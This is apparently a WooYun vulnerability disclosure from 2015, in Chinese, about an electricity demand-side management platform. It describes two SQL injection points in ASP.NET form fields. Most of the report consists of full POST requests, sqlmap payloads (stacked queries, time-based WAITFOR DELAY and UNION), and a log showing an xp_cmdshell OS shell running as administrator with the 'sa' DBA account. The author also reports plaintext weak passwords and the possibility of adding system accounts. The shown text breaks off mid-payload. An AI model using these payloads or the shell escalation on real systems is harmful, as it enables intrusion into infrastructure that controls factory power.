当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144620

漏洞标题:某电力需求侧管理平台SQL注入(DBA权限+密码明文弱口令+可os-shell+控制工厂用电)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-03 12:18

修复时间:2015-11-26 08:30

公开时间:2015-11-26 08:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

跟随大牛走,依旧没有修复!~~~那么就从获得的用户名进入后台后,进行测试,发现后台搜索的地方也是可以注入的。至于其他的会改变数据信息的地方就不测试了,怕有问题!~~~

详细说明:

1、注入点一:
修改密码处抓包,注入仍然没有被修复,DBA权限,通过该注入点,可以进行--os-shell直接添加系统帐号,远程登录,同时也可以获取管
理员密码,进入后台进行抓包。

**.**.**.**/DSM/ChangePassword.aspx (POST)
__VIEWSTATE=dDwxNzUwNzk0MzY3OztsPEltYWdlQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj5k8fYbxBon4dOAVmaNHqj3BeGDzg
%3D
%3D&TextBox4=111111111&TextBox3=111111111&TextBox2=111111&TextBox1=admin&ImageButton1.x=42&ImageButton1.
y=4


TextBox1存在注入

1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: TextBox1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=dDwxNzUwNzk0MzY3O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDIxPjs+O2w
8dDxwPHA8bDxUZXh0Oz47bDzor7fmo4Dmn6XkvaDnmoTovpPlhaU7Pj47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj7WPS6PzC8FI1DnGD2ngOfj0n1v1g==&TextBox4=111111111
&TextBox3=111111111&TextBox2=111111&TextBox1=admin'; WAITFOR DELAY '0:0:5'--&Ima
geButton1.x=42&ImageButton1.y=4
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=dDwxNzUwNzk0MzY3O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDIxPjs+O2w
8dDxwPHA8bDxUZXh0Oz47bDzor7fmo4Dmn6XkvaDnmoTovpPlhaU7Pj47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj7WPS6PzC8FI1DnGD2ngOfj0n1v1g==&TextBox4=111111111
&TextBox3=111111111&TextBox2=111111&TextBox1=admin' WAITFOR DELAY '0:0:5'--&Imag
eButton1.x=42&ImageButton1.y=4
---
[23:15:00] [INFO] testing Microsoft SQL Server
[23:15:00] [INFO] confirming Microsoft SQL Server
[23:15:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2008
[23:15:00] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[23:15:00] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[23:15:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
C
[23:15:20] [INFO] adjusting time delay to 1 second due to good response times
:\Program Files\Mi
[23:16:52] [ERROR] invalid character detected. retrying..
[23:16:52] [WARNING] increasing time delay to 2 seconds
crosoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG
[23:24:57] [INFO] testing if current user is DBA
[23:24:59] [INFO] checking if xp_cmdshell extended procedure is available, pleas
e wait..
[23:25:02] [INFO] xp_cmdshell extended procedure is available
[23:25:03] [INFO] testing if xp_cmdshell extended procedure is usable
[23:25:25] [INFO] xp_cmdshell extended procedure is usable
[23:25:25] [INFO] going to use xp_cmdshell extended procedure for operating syst
em command execution
[23:25:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press EN
TER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[23:25:55] [INFO] retrieved: 2
[23:26:00] [INFO] retrieved: win-6kusom0elh7\ad
[23:28:53] [ERROR] invalid character detected. retrying..
[23:28:53] [WARNING] increasing time delay to 3 seconds
ministrator
[23:31:15] [INFO] retrieved:
command standard output:    'win-6kusom0elh7\administrator'
[23:33:55] [INFO] fetching current user
[23:33:55] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[23:33:55] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[23:34:04] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[23:34:15] [INFO] adjusting time delay to 1 second due to good response times
sa
current user:    'sa'
[23:34:19] [INFO] fetching current database
[23:34:19] [INFO] retrieved: PowerV3
current database:    'PowerV3'
[23:34:55] [INFO] fetching server hostname
[23:34:55] [INFO] retrieved: WIN-6KUSOM0ELH7
hostname:    'WIN-6KUSOM0ELH7'
[23:35:59] [INFO] testing if current user is DBA
current user is DBA:    True


database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa


available databases [7]:
[*] Collect_SH
[*] master
[*] model
[*] msdb
[*] power_wujiang
[*] PowerV3
[*] tempdb


明文存储,还有众多的用户都是弱口令,你以为只是改了admin密码就可以了?得加密存储,而且通知到各位管理员更改密码吧!~~~

3.jpg


可以--os-shell提权就不说了,请看
http://**.**.**.**/bugs/wooyun-2015-0123049
Haswell大牛的测试过程
2、注入点二:
利用获取到的管理员的密码进入后台,抓包

**.**.**.**/DSM/SelectEP.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w8aTwxPjs
%2BO2w8dDw7bDxpPDM%2BO2k8ND47aTw1PjtpPDg%2BOz47bDx0PHQ8O3Q8aTw3PjtAPFxlO
%2BW4uOW3njvljZfkuqw76IuP5beeO%2BWkluW4gjvmlrDnloY75Lit5b%2BDOz47QDxcZTvluLjlt5475Y2X5LqsO%2BiLj
%2BW3njvlpJbluII75paw55aGO%2BS4reW/gzs%2BPjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ%2BO0A8bjvmtYvor5UyO
%2BW4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O%2BWnkeiLj%2BWMujvmmIblsbE76IuP5beeO%2BiLj
%2BW3nuWTjeW6lDvlpKrku5M75ZC05rGfO%2BWQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz47QDxuO%2Ba1i
%2BivlTI75bi454afO%2BmrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O%2BaYhuWxsTvoi4/lt5476IuP5bee5ZON5bqUO
%2BWkquS7kzvlkLTmsZ875ZC05Lit5Yy6O%2BebuOWfjuWMujvlvKDlrrbmuK87Pj47bDxpPDEzPjs
%2BPjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDxsPEl0ZW1Db3VudDs
%2BO2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3RpdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7O
zs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmFzZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZ
Ts
%2BPjs7Ozs7Ozs7Ozs7OztAMDxsPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9b
mV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs1MDwzPjs1MDw
0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
%2BO2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57qn5Yy65Z
%2BfO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs%2BO2w85LiA57qn5Yy65Z
%2BfOz4%2BOzs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p
%2BWMuuWfnzvkuoznuqfljLrln587bzx0Pjs%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs
%2BOzs%2BO0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs%2BO2w85LiJ57qn5Yy65Z%2BfO%2BS4iee6p
%2BWMuuWfnztvPHQ%2BOz4%2BOzs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p%2BWMuuWfnzs
%2BPjs7Oz47Oz47QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75LyB5Lia57yW5
6CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs
%2BO2w85LyB5Lia57yW56CBOz4%2BOzs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsP
OS8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs
%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs%2BOzs
%2BO0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs%2BO2w8U3lzdGVtLkludDY0O%2BWPl
%2BeUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs
%2BOzs%2BO0AwPHA8bDxLZXk7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs
%2BO2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLC
BJbmZyYWdpc3RpY3MuV2ViVUkuVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYW
wsIFB1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs
%2BPjtwPGw8QmFja0NvbG9yO0JvcmRlclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD
47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJl
PW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2
VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5G
b250VW5pdCwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM
2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA
%2BOz4%2BO3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmVDb2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzL
khvcml6b250YWxBbGlnbiwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva
2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2VudGVyXDtCYWNrZ3J
vdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ%2BOz4%2BOzs7O0AwPHA8bDxDYXB0aW9uOz47bDxcZTs
%2BPjs7Oz47Oz47Pjs%2BOzs7Pjs%2BOz47Ozs7Oz47Pjs7Pjs%2BPjs
%2BPjtsPEltYWdlQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4%2BuUb0LvrCN4cUV%2BKhXy6k/koWSoo%3D&DropDownList2=
%E8%8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE
%B6%E6%B8%AF&DropDownList4=n&TextBox1=333&UltraWebGrid1=%253CDisplayLayout%253E%253CStateChanges%253E
%253C/StateChanges%253E%253C/DisplayLayout%253E&ImageButton1.x=67&ImageButton1.y=13


另一个TextBox1存在注入,DBA权限

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: TextBox1
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%
8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox
1=333' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(110)+CHAR(117)+CHAR(113)+CHAR(8
8)+CHAR(77)+CHAR(112)+CHAR(79)+CHAR(122)+CHAR(86)+CHAR(71)+CHAR(73)+CHAR(106)+CH
AR(67)+CHAR(113)+CHAR(99)+CHAR(99)+CHAR(104)+CHAR(113),NULL,NULL,NULL,NULL,NULL-
- &UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges%3E%3C/StateChanges%3E%3C/Dis
playLayout%3E&ImageButton1.x=67&ImageButton1.y=13
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%
8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox
1=333'; WAITFOR DELAY '0:0:5'--&UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges
%3E%3C/StateChanges%3E%3C/DisplayLayout%3E&ImageButton1.x=67&ImageButton1.y=13
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
